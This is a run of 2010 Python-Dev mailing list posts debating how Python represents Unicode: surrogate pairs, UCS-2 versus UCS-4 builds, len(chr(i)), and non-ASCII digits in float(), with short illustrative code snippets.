 [u'A\u200bB']

That's a classical bug fix.
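On Python 2.7 and all of Python 3 the fixed behavior looks like this (U+200B ZERO WIDTH SPACE is a format character, category Cf, not whitespace):

```python
s = 'A\u200bB'
print(s.split())           # ['A\u200bB'] -- no longer split at U+200B
print('\u200b'.isspace())  # False
```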

 While we have little choice but to follow UCD in defining
 str.isidentifier(), I think Python can promise users more stability in
 what it treats as space or as a digit in its builtins. 

Why should we divert from the work done by the Unicode Consortium ?
After all, most of their changes are in fact bug fixes as well.

 For example,
 I don't think that supporting
 
 >>> float('١٢٣٤.٥٦')
 1234.56
 
 is more important than to assure users that once their program
 accepted some text as a number, they can assume that the text is
 ASCII.

Sorry, but I don't agree.

If ASCII numerals are an important aspect of an application, the
application should make sure that only those numerals are used
(e.g. by using a regular expression for checking).
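Such a check is straightforward with the re module; re.ASCII restricts \d to [0-9], whereas by default \d matches any Unicode decimal digit (a simple sign/decimal pattern for illustration, not a full float grammar):

```python
import re

ASCII_NUMBER = re.compile(r'[+-]?\d+(?:\.\d+)?', re.ASCII)

def is_ascii_number(text):
    # fullmatch: the whole string must be an ASCII-digit number.
    return ASCII_NUMBER.fullmatch(text) is not None

print(is_ascii_number('1234.56'))  # True
print(is_ascii_number('-42'))      # True
print(is_ascii_number('١٢٣٤.٥٦'))  # False -- non-ASCII digits rejected
```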

In a Unicode world, not accepting non-Arabic numerals would be
a limitation, not a feature. Besides Python has had this support
since Python 1.6.

 [1] http://bugs.python.org/issue10567
 [2] http://bugs.python.org/issue10557
 [3] http://www.unicode.org/versions/Unicode6.0.0/#Database_Changes

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] len(chr(i)) = 2?

2010-11-25 Thread M.-A. Lemburg
Terry Reedy wrote:
 On 11/24/2010 3:06 PM, Alexander Belopolsky wrote:
 
 Any non-trivial text processing is likely to be broken in presence of
 surrogates.  Producing them on input is just trading known issue for
 an unknown one.  Processing surrogate pairs in python code is hard.
 Software that has to support non-BMP characters will most likely be
 written for a wide build and contain subtle bugs when run under a
 narrow build.  Note that my latest proposal does not abolish
 surrogates outright.  Users who want them can still use something like
 surrogateescape  error handler for non-BMP characters.
 
 It seems to me that what you are asking for is an alternate, optional,
 utf-8-bmp codec that would raise an error, in either direction, for
 non-bmp chars. Then, as you suggest, if one is not prepared for
 surrogates, they are not allowed.

That would be a possibility as well... but I doubt that many users
are going to bother, since slicing surrogates is just as bad as
slicing combining code points and the latter are much more common in
real life and they do happen to mostly live in the BMP.
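For readers of the archive: the narrow/wide-build split discussed here was later resolved by PEP 393 (Python 3.3), where len(chr(i)) is always 1 and surrogate pairs appear only at the encoding level:

```python
c = chr(0x1F600)  # GRINNING FACE, a non-BMP code point
print(len(c))                      # 1 on CPython 3.3+ (was 2 on narrow builds)
print(len(c.encode('utf-16-le')))  # 4 bytes = two UTF-16 code units
print(len(c.encode('utf-8')))      # 4 bytes in UTF-8 as well
```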

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] len(chr(i)) = 2?

2010-11-25 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Wed, Nov 24, 2010 at 9:17 PM, Stephen J. Turnbull step...@xemacs.org 
 wrote:
 ..
   I note that an opinion has been raised on this thread that
   if we want compressed internal representation for strings, we should
   use UTF-8.  I tend to agree, but UTF-8 has been repeatedly rejected as
   too hard to implement.  What makes UTF-16 easier than UTF-8?  Only the
   fact that you can ignore bugs longer, in my view.

 That's mostly true.  My guess is that we can probably ignore those
 bugs for as long as it takes someone to write the higher-level
 libraries that James suggests and MAL has actually proposed and
 started a PEP for.

 
 As far as I can tell, that PEP generated a grand total of one comment in
 nine years.  This may or may not be indicative of how far away we are
 from seeing it implemented.  :-)

At the time it was too early for people to start thinking about
these issues. Actual use of Unicode really only started a few years
ago.

Since I didn't have a need for such an indexing module myself
(and didn't have much time to work on it anyway), I punted on the
idea.

If someone else wants to pick up the idea, I'd gladly help out with
the details.

 As far as UTF-8 vs. UCS-2/4 debate, I have an idea that may be even
 more far fetched.  Once upon a time, Python Unicode strings supported
 buffer protocol and would lazily fill an internal buffer with bytes in
 the default encoding.  In 3.x the default encoding has been fixed as
 UTF-8, buffer protocol support was removed from strings, but the
 internal buffer caching (now UTF-8) encoded representation remained.
 Maybe we can now implement defenc logic in reverse.  Recall that
 strings are stored as UCS-2/4 sequences, but once buffer is requested
 in 2.x Python code or char* is obtained via
 _PyUnicode_AsStringAndSize() at the C level in 3.x, an internal buffer
 is filled with UTF-8 bytes and  defenc is set to point to that buffer.

The original idea was for that buffer to go away once we moved
to Unicode for strings. Reality has shown that we still need
to stick with the buffer, though, since the UTF-8 representation
of Unicode objects is used a lot.

   So the idea is for strings to store their data as UTF-8 buffer
 pointed by defenc upon construction.  If an application uses string
 indexing, UTF-8 only strings will lazily fill their UCS-2/4 buffer.
 Proper, Unicode-aware algorithms such as grapheme, word or line
 iteration or simple operations such as concatenation, search or
 substitution would operate directly on defenc buffers.  Presumably
 over time fewer and fewer applications would use code unit indexing
 that require UCS-2/4 buffer and eventually Python strings can stop
 supporting indexing altogether just like they stopped supporting the
 buffer protocol in 3.x.

I don't follow you: how would UTF-8, which has even more issues
with variable-length representation of code points, make something
easier compared to UTF-16, which has far fewer such issues, and
then only for non-BMP code points?

Please note that we can only provide one way of string indexing
in Python using the standard s[1] notation, and since we want
that operation to be fast, i.e. no more than O(1), using the
code units as items is the only reasonable way to implement it.
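For illustration, here's what code-unit indexing looks like for a
non-BMP code point. This sketch uses explicit surrogate literals,
which behave the same on any build:

```python
# On a UCS-2 build, a non-BMP code point occupies two code units,
# so s[i] indexes code units, not code points. Reproduce that view
# with an explicit surrogate pair for U+10140:
narrow_view = '\ud800\udd40'
assert len(narrow_view) == 2         # two code units
assert narrow_view[0] == '\ud800'    # indexing yields a lone surrogate
# Interpreting the pair as UTF-16 reassembles the real code point:
roundtrip = narrow_view.encode('utf-16-be', 'surrogatepass').decode('utf-16-be')
assert roundtrip == '\U00010140'
```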

With an indexing module, we could then let applications work
based on higher level indexing schemes such as complete code
points (skipping surrogates), combined code points, graphemes
(ignoring e.g. most control code points and zero width
code points), words (with some customizations as to where to
break words, which will likely have to be language dependent),
lines (which can be complicated for scripts that use columns
instead ;-)), paragraphs, etc.

It would also help to add transparent indexing for right-to-left
scripts and for text that mixes left-to-right and right-to-left
runs (BIDI).

However, in order for these indexing methods to actually work,
they will need to return references to the code units, so we cannot
just drop that access method.

* Back on the surrogates topic:

In any case, I think this discussion is losing its grip on reality.

By far, most strings you find in actual applications don't use
surrogates at all, so the problem is being exaggerated.

If you need to be careful about surrogates for some reason, I think
a single new method .hassurrogates() on string objects would
go a long way in making detection and adding special-casing for
these a lot easier.
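A minimal sketch of such a method, written as a plain function for
illustration (the name has_surrogates() and its semantics are
assumptions here; no such string method exists):

```python
# Hypothetical sketch of the proposed .hassurrogates() check:
# scan the string for code units in the surrogate range.
def has_surrogates(s):
    """Return True if s contains any code unit in U+D800..U+DFFF."""
    return any(0xD800 <= ord(c) <= 0xDFFF for c in s)

assert has_surrogates('\ud800') is True    # lone high surrogate
assert has_surrogates('hello') is False
```

A C implementation on the string object could of course do this scan
much faster, which is the point of proposing it as a method.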

If adding support for surrogates doesn't make sense (e.g. in the
case of the formatting methods), then we simply punt on that and
leave such handling to other tools.

* Regarding preventing surrogates from entering the Python
runtime:

It is by far more important to maintain round-trip safety for
Unicode data, than getting every bit of code work correctly
with surrogates (often, there won't be a single correct way).

With a new method for fast detection of surrogates, we could
protect code which obviously 

Re: [Python-Dev] len(chr(i)) = 2?

2010-11-24 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 To conclude, I feel that rather than trying to fully support non-BMP
 characters as surrogate pairs in narrow builds, we should make it
 easier for application developers to avoid them. 

I don't understand what you're after here. Programmers can easily
avoid them by not using them :-)

 If abandoning
 internal use of UTF-16 is not an option, I think we should at least
 add an option for decoders that currently produce surrogate pairs to
 treat non-BMP characters as errors and handle them according to user's
 choice.

But what do you gain by doing this ? You'd lose the round-trip
safety of those codecs and that's not a good thing.

Note that most text processing APIs in Python work based on code
units, which in most cases represent single code points, but in
some cases can also represent surrogates (both on UCS-2 and on
UCS-4 builds).

E.g. str.center(n) centers the string in a padded string that
is composed of n code units. Whether that operation will result
in a text that's centered visually on output is a completely
different story. The original string could contain surrogates,
it could also contain combining code points, so the visual
presentation of the result may very well not be centered at
all; it may not even appear as having the length n to the user.

Since we're not going change the semantics of those APIs,
it is OK to not support padding with non-BMP code points on
UCS-2 builds.

Supporting such cases would only cause problems:

* if the methods would pad with surrogates, the resulting
  string would no longer have length n; breaking the
  assumption that len(str.center(n)) == n

* if the methods would pad with half the number of surrogates
  to make sure that len(str.center(n)) == n, the resulting
  output to e.g. a terminal would be further off, than what
  you already have with surrogates and combining code points
  in the original string.
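The invariant in question can be checked directly (a small sketch;
note that len() counts code units and has no relationship to visual
width):

```python
# Centering pads to exactly n code units:
s = 'xyz'
assert len(s.center(20)) == 20
# A string with a combining code point keeps the same invariant,
# even though it renders as fewer visible characters:
accented = 'e\u0301'                 # 'e' + combining acute accent
assert len(accented.center(10)) == 10
```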

More on codecs supporting surrogates:

  http://mail.python.org/pipermail/python-dev/2008-July/080915.html

Perhaps it's time to reconsider a project I once started
but that never got off the ground:

  http://mail.python.org/pipermail/python-dev/2008-July/080911.html

Here's the pre-PEP:

  http://mail.python.org/pipermail/python-dev/2001-July/015938.html

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] len(chr(i)) = 2?

2010-11-23 Thread M.-A. Lemburg
Alexander Belopolsky wrote:
 On Mon, Nov 22, 2010 at 1:13 PM, Raymond Hettinger
 raymond.hettin...@gmail.com wrote:
 ..
 Any explanation we give users needs to let them know two things:
 * that we cover the entire range of unicode not just BMP
 * that sometimes len(chr(i)) is one and sometimes two
 
 This discussion motivated me to start looking into how well Python
 library itself is prepared to deal with len(chr(i)) = 2.  I was not
 surprised to find that textwrap does not handle the issue that well:
 
 >>> len(wrap(' \U00010140' * 80, 20))
 12
 >>> len(wrap(' \u0140' * 80, 20))
 8
 
 That module should probably be rewritten to properly implement  the
 Unicode line breaking algorithm
 http://unicode.org/reports/tr14/tr14-22.html.
 
 Yet finding a bug in a str object method after a 5 min review was a
 bit discouraging:
 
 >>> 'xyz'.center(20, '\U00010140')
 Traceback (most recent call last):
   File "<stdin>", line 1, in <module>
 TypeError: The fill character must be exactly one character long
 
 Given the apparent difficulty of writing even basic text processing
 algorithms in presence of surrogate pairs, I wonder how wise it is to
 expose Python users to them. 

What's the alternative ?

Without surrogates, Python users with UCS-2 build (e.g. the Windows
Python users) would not be allowed to play with non-BMP code points.

IMHO, it's better to fix the stdlib. This is a long process, as you
can see with the Python3 stdlib evolution, but Python will eventually
get there.

 As Wikipedia explains, [1]
 
 
 Because the most commonly used characters are all in the Basic
 Multilingual Plane, converting between surrogate pairs and the
 original values is often not tested thoroughly. This leads to
 persistent bugs, and potential security holes, even in popular and
 well-reviewed application software.
 
 
 Since UCS-2 (the Character Encoding Form (CEF)) is now defined [1] to
 cover only BMP, maybe rather than changing the terms used in the
 reference manual, we should tighten the code to conform to the updated
 standards?

Can we please stop turning this around over and over again :-)
UCS-2 has never supported anything other than the BMP. However,
you can interpret sequences of UCS-2 code unit as UTF-16 and
then get access to the full Unicode character set. We've been
doing this in codecs ever since UCS-4 builds were introduced
some 8-9 years ago.

The change to have chr(i) return surrogates on UCS-2 builds
was perhaps done too early, but then, without such changes you'd
never notice that your code doesn't work well with surrogates.
It's just one piece of the puzzle when going from 8-bit strings
to Unicode.
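For reference, the arithmetic behind that UTF-16 interpretation can be
sketched as follows (to_surrogate_pair() is an illustrative helper,
not a stdlib API):

```python
# Map a non-BMP code point to its UTF-16 surrogate pair: subtract
# 0x10000, then split the remaining 20 bits into two 10-bit halves.
def to_surrogate_pair(cp):
    assert cp > 0xFFFF
    cp -= 0x10000
    return 0xD800 + (cp >> 10), 0xDC00 + (cp & 0x3FF)

hi, lo = to_surrogate_pair(0x10140)
assert (hi, lo) == (0xD800, 0xDD40)
# Cross-check against the UTF-16 codec:
assert '\U00010140'.encode('utf-16-be') == b'\xd8\x00\xdd\x40'
```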

 Again, given that the str object itself has at least one non-BMP
 character bug as we are closing on the third major release of py3k,
 how likely are 3rd party developers to get their libraries right as
 they port to 3.x?
 
 [1] http://en.wikipedia.org/wiki/UTF-16/UCS-2
 [2] http://unicode.org/reports/tr17/#CharacterEncodingForm

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] len(chr(i)) = 2?

2010-11-22 Thread M.-A. Lemburg
Martin,

it is really irrelevant whether the standards have decided
to no longer use the terms UCS-2 and UCS-4 in their latest
standard documents.

The definitions still stand (just like Unicode 2.0 is still a valid
standard, even if it's ten years old):

* UCS-2 is defined as "Universal Character Set coded in 2 octets"
by ISO/IEC 10646 (see http://www.unicode.org/versions/Unicode5.2.0/appC.pdf)

* UCS-4 is defined as "Universal Character Set coded in 4 octets"
by ISO/IEC 10646.

Those two terms have been in use for many years. They refer to
the Unicode character set as it can be represented in 2 or 4
bytes. As such they don't include any of the special meanings
associated with the UTF transfer encodings. There are no invalid
sequences, no invalid code points, etc. as you can find in the UTF
encodings. And that's an important detail.

If you interpret them as encodings, they are 1-1 mappings of
Unicode code point ordinals to integers represented using
2 or 4 bytes.

UCS-2 only supports BMP code points and can conveniently
be interpreted as UTF-16, if you need to encode non-BMP
code points (which we do in the UTF codecs).

UCS-4 also supports non-BMP code points directly.

Now, from a ISO or Unicode Consortium point of view, deprecating
the term UCS-2 in *their* standard papers is only natural, since
they are actively starting to assign non-BMP code points which
cannot be represented in UCS-2.

However, this deprecation is only relevant for the purpose of defining
the standard. The above definitions are still useful
when it comes to defining code units, i.e. the used storage format,
(as opposed to the transfer format).

For the purpose of describing the code units we are using in Python
they are (still) the most correct terms and that's also the reason
why we chose to use them when introducing the configure options
in Python2.

There are no other accurate definitions we could use. The terms
"narrow" and "wide" are simply too inaccurate to be used as
descriptions of UCS-2 and UCS-4 code units.

Please also note that we have used the terms UCS-2 and UCS-4 in Python2
for 9+ years now and users are just starting to learn the difference
and get acquainted with the fact that Python uses these two forms.

Confronting them with narrow and wide builds is only
going to cause more confusion, not less, and adding those
strings to Python package files isn't going to help much either,
since the terms don't convey any relationship to Unicode:

package-3.1.3.linux-x86_64-py2.6_ucs2.egg
vs.
package-3.1.3.linux-x86_64-py2.6_narrow.egg

I opt for switching to the following config options:

--with-unicode=ucs2 (default)
--with-unicode=ucs4

and using UCS-2 and UCS-4 in the Python documentation when
describing the two different build modes.  We can add glossary
entries for the two which clarify the differences.

Python2 used --enable-unicode=ucs2/ucs4, but since Python3 doesn't
build without Unicode support, the above two versions appear more
appropriate.

We can keep the alternative --with-wide-unicode as an alias
for --with-unicode=ucs4 to maintain 3.x backwards compatibility.

Cheers,
-- 
Marc-Andre Lemburg
eGenix.com



Martin v. Löwis wrote:
 Am 22.11.2010 11:48, schrieb Stephen J. Turnbull:
 Raymond Hettinger writes:

   Neither UTF-16 nor UCS-2 is exactly correct anyway.

 From a standards lawyer point of view, UCS-2 is exactly correct, as
 far as I can tell upon rereading ISO 10646-1, especially Annexes H
 (retransmitting devices) and Q (UTF-16).  Annex Q makes it clear
 that UTF-16 was intentionally designed so that Python-style processing
 could be done in a UCS-2 context.
 
 I could only find the FCD of 10646:2010, where annex H was integrated
 into section 10:
 
 http://www.itscj.ipsj.or.jp/sc2/open/02n4125/FCD10646-Main.pdf
 
 There they have stopped using the term UCS-2, and added a note
 
 # NOTE – Former editions of this standard included references to a
 # two-octet BMP form called UCS-2 which would be a subset
 # of the UTF-16 encoding form restricted to the BMP UCS scalar values.
 # The UCS-2 form is deprecated.
 
 I think they are now acknowledging that UCS-2 was a misleading term,
 making it ambiguous whether this refers to a CCS, a CEF, or a CES;
 like ASCII, people have been using it for all three of them.
 
 Apparently, the ISO WG interprets earlier 

Re: [Python-Dev] len(chr(i)) = 2?

2010-11-22 Thread M.-A. Lemburg
Raymond Hettinger wrote:
 Any explanation we give users needs to let them know two things:
 * that we cover the entire range of unicode not just BMP
 * that sometimes len(chr(i)) is one and sometimes two
 
 The term UCS-2 is a complete communications failure
 in that regard.  If someone looks up the term, they will
 immediately see something like the wikipedia entry which says,
 "UCS-2 cannot represent code points outside the BMP."
 How is that helpful?

It's very helpful, since it explains why a UCS-2 build of Python
requires a surrogates pair to represent a non-BMP code point
and explains why chr(i) gives you a length 2 string rather than
a length 1 string.

A UCS-4 build does not need to use surrogates for this, hence
you get a length 1 string from chr(i).

There are two levels we have to explain to users:

1. the transfer level

2. the storage level

The UTF encodings address the transfer level and are what
you deal with in I/O. These provide variable-length encodings of
the complete Unicode code point range, regardless of whether
you have a UCS-2 or a UCS-4 build.

The storage level becomes important if you want to work on
strings using indexing and slicing. Here you do have to know
whether you're dealing with a UCS-2 or a UCS-4 build, since the
indexes will vary if you're using non-BMP code points.

Finally, to tie both together, we have to explain that UTF-16
(the transfer encoding) maps to UCS-2 in a straight-forward way,
so it is possible to work with a UCS-2 build of Python and still
use the complete Unicode code point range - you only have to
take into consideration that Python's string indexing will not
necessarily point you to the n-th code point in a string, but may
well give you one half of a surrogate pair.

Note that while that last aspect may appear like a good argument
for UCS-4 builds, in reality it is not. UCS-4 has the same
issue on a different level: the letters that get printed on
the screen or printer (graphemes) may well be made up of
multiple combining code points, e.g. an "e" followed by a
combining acute accent. Those again map to two indexes in the
Python string, even though they appear as one character on output.
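A small example of the combining-code-point case, using the stdlib
unicodedata module:

```python
import unicodedata

# One visible letter, two code points: 'e' plus a combining acute
# accent. Indexing and len() count code points, not graphemes.
s = 'e\u0301'
assert len(s) == 2
assert unicodedata.category(s[1]) == 'Mn'   # nonspacing combining mark
# NFC normalization folds the pair into one precomposed code point:
assert unicodedata.normalize('NFC', s) == '\u00e9'
assert len(unicodedata.normalize('NFC', s)) == 1
```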

Now try to explain all of the above using the terms narrow
and wide (while remembering explicit is better than implicit
and avoid the temptation to guess) :-)

It is not really helpful to replace a correct and accurate
term with a fuzzy term: either way we're stuck with the
semantics.

However, the correct and accurate terms at least give
you a chance to figure out and understand the reasoning
behind the design. UCS-2 vs. UCS-4 is a trade-off, narrow
and wide is marketing talk with an implicit emphasis on
one side :-)

-- 
Marc-Andre Lemburg
eGenix.com



Re: [Python-Dev] len(chr(i)) = 2?

2010-11-19 Thread M.-A. Lemburg
Victor Stinner wrote:
 Hi,
 
 On Friday 19 November 2010 17:53:58 Alexander Belopolsky wrote:
 I was recently surprised to learn that chr(i) can produce a string of
 length 2 in python 3.x.
 
 Yes, but only on narrow build. Eg. Debian and Ubuntu compile Python 3.1 in 
 wide mode (sys.maxunicode == 1114111).
 
 I suspect that I am not alone finding this behavior non-obvious 
 given that a mistake in Python manual stating the contrary survived 
 several releases.  [1]
 
 It was a documentation bug and you fixed it. Non-BMP characters are rare, so 
 few (maybe only you?) noticed the documentation bug. I consider the behaviour 
 as an improvment of non-BMP support of Python3.
 
 Python is unclear about non-BMP characters: narrow build was called ucs2 
 for 
 long time, even if it is UTF-16 (each character is encoded to one or two 
 UTF-16 words).

No, no, no :-)

UCS2 and UCS4 are more appropriate than narrow and wide or even
UTF-16 and UTF-32.

It's rather common to confuse a transfer encoding with a storage format.
UCS2 and UCS4 refer to code units (the storage format). You can use
UCS2 and UCS4 code units to represent UTF-16 and UTF-32 resp., but those
are not the same things.

In UTF-16 0xD800 has a special meaning, in UCS2 it doesn't.
Python uses UCS2 internally. It does not assign a special meaning
to those surrogate code point ranges.
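That difference is easy to demonstrate with the codecs (a sketch; the
'surrogatepass' error handler used here is the way to get the bare
code-unit behaviour out of the strict UTF-16 codec):

```python
# In UTF-16, 0xD800 is only valid as part of a surrogate pair, so the
# strict codec rejects a lone surrogate; as a bare UCS-2 code unit it
# is just a value, which 'surrogatepass' preserves.
lone = '\ud800'
try:
    lone.encode('utf-16-be')
except UnicodeEncodeError:
    pass                            # expected: strict UTF-16 refuses it
else:
    raise AssertionError('strict UTF-16 should reject a lone surrogate')
assert lone.encode('utf-16-be', 'surrogatepass') == b'\xd8\x00'
```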

However, when it comes to codecs, we do try to make use of the fact
that UCS2 can easily be used to represent an UTF-16 encoding and
that's why you often see surrogates being created for code points
that wouldn't otherwise fit into UCS2 and you see those surrogates
being converted back to single code units in UCS4 builds.

I don't know who invented the terms narrow and wide builds
for Python3. Not me that's for sure :-) They don't have any
meaning in Unicode terminology and thus cause even more confusion
than UCS2 and UCS4. E.g. the import errors you
get when importing extensions built for a different Unicode
version, (correctly) refer to UCS2 vs. UCS4 and now give even less
of a clue that they relate to difference in Unicode builds (since
these are now labeled narrow and wide).

IMO, we should go back to the Python2 terms UCS2 and UCS4 which
are correct and provide a clear description of what Python uses
internally for code units.

 Python2 accepts non-BMP characters with \U syntax, but not with 
 chr(). This is inconsistent and I see this as a bug. But I don't want to 
 touch 
 Python2 about non-BMP characters, and the bug is already fixed in Python3!
 
 I do believe, however that a change like
 this [2] and its consequences should be better publicized.
 
 Change made before the release of Python 3.0. Do you want to patch the 
 What's 
 new in Python 3.0? document?

Perhaps add a section "What we forgot to mention in 3.0" or
"What's not so new in 3.2" to "What's new in 3.2" :-)

 I have not
 found any discussion of this change in PEPs or What's new documents.
  The closest find was a mentioning of a related issue #3280 in the 3.0
 NEWS file. [3]  Since this feature will be first documented in the
 Library Reference in 3.2, I wonder if it will be appropriate to
 mention it in What's new in 3.2?
 
 In my opinion, the question is more why it was not fixed in Python2.
 I suppose that the answer is something ugly like "backward
 compatibility" or "historical reasons" :-)

Backwards compatibility.

Python2 applications don't expect unichr(i)
to return anything other than a single character. If you need this
in Python2, it's easy enough to get around, though, with a little
helper function.
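Such a helper might look like this (wide_chr() is a hypothetical name
for illustration; the sketch builds the code point via the
unicode-escape codec and runs on Python 3 as well):

```python
# Build any code point from its ordinal, even on a narrow build where
# unichr()/chr() stops at 0xFFFF: format the ordinal as a \U escape
# and let the unicode-escape codec expand it (into a surrogate pair
# on narrow builds, a single code point otherwise).
def wide_chr(i):
    return ('\\U%08x' % i).encode('ascii').decode('unicode-escape')

assert wide_chr(0x10140) == '\U00010140'
assert wide_chr(0x41) == 'A'
```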

-- 
Marc-Andre Lemburg
eGenix.com


